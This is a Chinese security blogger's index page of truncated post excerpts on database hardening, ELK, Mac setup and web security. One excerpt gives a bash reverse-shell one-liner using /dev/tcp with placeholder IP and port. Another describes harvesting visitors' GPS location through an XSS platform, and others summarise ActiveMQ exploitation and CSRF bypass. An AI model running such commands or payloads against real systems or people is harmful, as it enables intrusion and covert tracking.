Lee_Natuo的博客

原创 数据库MySQL最大连接数、最大活跃连接数、最大并发数、并发会话数区别

这里写自定义目录标题)数据库MySQL最大连接数、最大活跃连接数、最大并发数、并发会话数区别最大连接数：基于IP建立连接数。最大活跃连接/并发连接/并发会话：最大活跃连接是并发连接数，但和并发会话数不是一个概念，连接数是数据链路层，而会话是指数据库业务上的。建立一个数据库会话一般会占用多个连接。（连接数与并发会话在实际用户场景中会基本上有个比例，大概连接数与会话数是5:1的关系）...

转载 数据安全之数据分类分级系统建设

感谢原作者分享本文转载自：https://blog.csdn.net/a59a59/article/details/105870166一、数据分类分级的意义 数据分类分级在数据安全治理过程中至关重要，数据的分级是数据重要性的直观化展示，是组织内部管理体系编写的基础、是技术支撑体系落地实施的基础、是运维过程中合理分配精力及力度的基础（80%精力关注重要数据，20%精力关注普通数据）。数据分类分级起到成承上（管理）启下（技术）的作用。承上：从运维制度、保障措施、岗位职责等多个方面的管理体系都需...

原创 openssl计算证书hash

执行语句openssl x509 -subject_hash_old -in /burp216.cer -text//text可以查看详情打印道屏幕报错信息unable to load certificate140735735321544:error:0906D06C:PEM routines:PEM_read_bio:no start line:/BuildRoot/Library/C...

转载 ActiveMQ漏洞利用总结

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。本文链接：https://blog.csdn.net/weixin_42936566/article/details/87004649ActiveMQApache ActiveMQ是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务、集群、Spring...

原创 Mac OS主机连接Wifi，虚拟机配置桥接

直接虚拟机设置桥接模式即可。选择机器，右键设置-->网络--->连接方式--->桥接网卡

转载 Linux反弹shell命令语句解析

Linux反弹shell命令语句语句格式bash -i >& /dev/tcp/[ip]/[port] 0>&1bash -i 打开bash&后面跟 /dev/tcp/[ip]/[port] （相当于>&后面接文件）将bash的标准输出和标准错误输出传递到远

原创 Oracle数据库安全基线（加固方法）

Oracle数据库安全基线基本安全原则选择稳定版本并及时更新、打补丁严禁使用弱口令，定期更新口令严格的权限分配和访问控制具体安全配置账户和密码禁止帐户共用使用命令：sqlplus /nolog;connect /as sysdba;#登录到 sqlplus环境中执行命令：select username from dba_users where ACCOUNT_...

原创 MySQL数据库安全基线（加固方法）

MySQL数据库安全加固方法基本安全原则选择稳定版本并及时更新、打补丁严禁使用弱口令，定期更新口令严格的权限分配和访问控制具体安全配置系统层面配置系统安装时，需要确认没有其他⽤户登录在服务器上。选择稳定的版本，并及时更新到最新版本、打补丁查看系统防火墙或网络安全设备，是否有限制对MySQL数据库的访问不设置环境变量或确保MYSQL_PWD环境变量未设置敏感信...

原创 利用开源XSS平台获取经纬度位置信息

1、利用的平台：http://xss.asgsec.cn/index.php直接注册，登录即可。2、创建自己的项目，随便取个名字。3、创建模块，这里创建一个获取经纬度功能的模块。4、具体代码内容：function getLocation() //获取GPS定位方法 { if (navigator.geolocation) { navigator.geoloca...

原创 Python批量处理Word文档(.doc/.docx)——批量获取文档标题并以标题重命名文件

Python处理Word文档(.doc/.docx)——批量获取文档标题并以标题重命名文件由于工作需要处理一批.doc文档，并且需要核对每个文档的标题，以标题重命名文件，之后将word文档批量转换成pdf。人工完成这些内容再文档数量庞大的情况下耗时耗力，于是写了几个脚本来处理。需要安装python-docx，pywin32库。doc2docx.pyPython有专门读取.docx的模块py...

原创 Burp Suite抓取安卓手机微信小程序数据包（HTTPS) 主机有线/无线连接两种方式

主机有线连接1、电脑放热点，然后用手机连接热点。2、手机连接该热点，在电脑的移动热点—设置中可以看到连接的设备。3、查看电脑无线网络的IP地址，cmd—ipconfig—无线局域网适配器 本地连接* 10—IPV4地址4、打开手机网络设置，长按连接的无线网络名称，修改网络5、高级设置—代理—在服务器主机名输入步骤 3的IP地址，端口设置80806、设置...

原创 MySQL数据库安全加固方法

MySQL数据库安全加固方法基本安全原则 选择稳定、无漏洞版本并及时升级更新、打补丁 配置防火墙策略，更改默认端口 避免使用弱口令，定期更新口令 严格的权限分配和访问控制 具体安全配置系统层面配置 系统安装时，需要确认没有其他⽤户登录在服务器上。建议在服务器本地安装，不使⽤⽹络远程安装。 数据库版本选择稳定、无漏洞的版本，并及时更新、...

原创 数据库安全加固（通用规则）

数据库安全加固（通用规则）数据库安全威胁业务系统 系统漏洞 DDOS 攻击 SQL注入（高发） 自定义、自封装接口漏洞 滥用合法权限或者合法权限泄漏 业务系统攻击间接传导 业务日志泄露 请求分配不均（主要影响应用性能） 数据库自身 系统漏洞 通信协议漏洞 软件漏洞导致权限提升 ...

转载 服务的校验Content-Type，只接收application/json格式的CSRF绕过方法

如何在JSON端点上利用CSRF漏洞转载自：https://www.freebuf.com/articles/web/164234.htmlAlpha_h4ck（CSRF + Flash + HTTP 307）=别说了，你已经“死”了！如果你想通过第三方攻击者控制的服务器在JSON端点利用一个CSRF漏洞的话，我给大家推荐一个名叫json-flash-csrf-poc的GitH...

原创 Mac os 将以逗号分隔的txt文本文档（dns日志文档）导入MySQL数据库

1、mysql -u root -p 登录mysql2、use dnslog; 进入dnslog数据库3、创建表logs:4、创建完成后，发现其实不需要id字段，因为时间戳可以作为唯一标示    alter table logs DROP COLUMN id; #删除id字段即可5、导入文件,用LOAD DATA INFILE 如果是导出则是OUTIFILELOAD DATA INFILE "/....

原创 【2018.5更新】mac os high sierra上安装配置tensorflow 并用Pycharm调试virtualenv中的tensorflow环境

参考该链接点击打开链接安装virtualenv虚拟环境，这样在一个新的干净的环境下就可以开始自由使用tensorflow了。1、使用workon命令进入虚拟环境，我的用来安装tensorflow的虚拟环境为env22、执行命令  pip install tf-nightly （cpu版）或者 pip install tf-nightly-gpu（gpu版）然后系统就会安装好所有的依赖包和环境...

原创 Mac high sierra10.13.4上安装配置virtualenv虚拟环境

Mac High Sierra10.13.4配置vitrualenv虚拟环境参考链接：点击打开链接虚拟环境可以搭建独立的Python运行环境，使单个项目运行环境和其他项目运行环境互不影响。下面介绍一下安装方法：1、安装virtualenv ---- sudo pip install virtualenv测试：​$ mkdir testvittualenv #创建一个文件夹放置所有的虚拟环境 ...

原创 Mac high sierra运行pip时报错command not found和ImportError: cannot import name ContextualZipFile

1、找不到pip命令lijing:~ SEU-Li$ pip-bash: pip: command not found2、运行sudo easy_install pip报错lijing:~ SEU-Li$ sudo easy_install pipPassword:Traceback (most recent call last): File "/usr/bin/easy_install...

原创 读书笔记：《互联网企业安全高级指南》知识梳理

原创 白帽子讲Web安全知识梳理思维导图

原创 ELK stack权威指南知识结构整理阅读笔记

ELK stack阅读整理1.ELK是什么Logstash（收集）、Elasticsearch（存储+搜索）、Kibana（展示），我们将这三个组合起来的技术称之为ELK Stack，所以说ELK Stack指的是Elasticsearch(java)、Logstash(jruby)、Kibana技术栈的结合，一个通用的架构如下图所示：ELK 前面主要靠Logstash来进行收集日志，Logsta...

原创 虚拟机桥接模式无法上网问题解决

虚拟机桥接模式无法上网在VM中编辑——虚拟网络编辑器——桥接到 ：主机的网卡，不要选择自动。选择自动不能联网，桥接到主机网卡即可。主机网卡可以在主机的网络中心查看。

原创 CentOS 6.5搭建ELK环境ElasticSearch+Kibana+Logstash

CentOS 6.5搭建ELK环境ELK工作流程多个独立的Agent(Shipper)负责收集不同来源的数据，一个中心Agent(Indexer)负责汇总和分析数据，在中心Agent前的Broker(使用Redis实现)作为缓冲区，中心Agent后的ElasticSearch用于存储和搜索数据，前端的Kibana提供丰富的图表展示。Shipper表示日志收集，使用L